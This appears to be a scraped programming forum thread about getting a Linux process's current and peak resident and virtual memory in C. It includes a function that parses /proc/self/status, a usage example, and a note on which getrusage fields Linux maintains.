I used this code, but for some reason I get 0 all the time for all 4 printf() calls.
I'm late to the party, but this might be helpful for anyone else looking for the current resident and virtual memory (and their peak values so far) on Linux.
It's probably pretty terrible, but it gets the job done.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Measures the current (and peak) resident and virtual memories
 * usage of your linux C process, in kB
 */
void getMemory(
    int* currRealMem, int* peakRealMem,
    int* currVirtMem, int* peakVirtMem) {

    // stores each word in status file
    char buffer[1024] = "";

    // linux file contains this-process info
    FILE* file = fopen("/proc/self/status", "r");

    // read the entire file
    while (fscanf(file, " %1023s", buffer) == 1) {

        if (strcmp(buffer, "VmRSS:") == 0) {
            fscanf(file, " %d", currRealMem);
        }
        if (strcmp(buffer, "VmHWM:") == 0) {
            fscanf(file, " %d", peakRealMem);
        }
        if (strcmp(buffer, "VmSize:") == 0) {
            fscanf(file, " %d", currVirtMem);
        }
        if (strcmp(buffer, "VmPeak:") == 0) {
            fscanf(file, " %d", peakVirtMem);
        }
    }
    fclose(file);
}
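A short usage sketch for the function above (the main() is mine; all four values come back in kB, matching /proc/self/status):

/* Sketch: call getMemory() and print the four values (all in kB). */
int main(void)
{
    int currRealMem = 0, peakRealMem = 0, currVirtMem = 0, peakVirtMem = 0;

    getMemory(&currRealMem, &peakRealMem, &currVirtMem, &peakVirtMem);
    printf("VmRSS: %d kB, VmHWM: %d kB, VmSize: %d kB, VmPeak: %d kB\n",
           currRealMem, peakRealMem, currVirtMem, peakVirtMem);
    return 0;
}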
The above struct was taken from 4.3BSD Reno. Not all fields are meaningful under Linux. In Linux 2.4 only the fields ru_utime, ru_stime, ru_minflt, and ru_majflt are maintained. Since Linux 2.6, ru_nvcsw and ru_nivcsw are also maintained.
http://www.atarininja.org/index.py/tags/code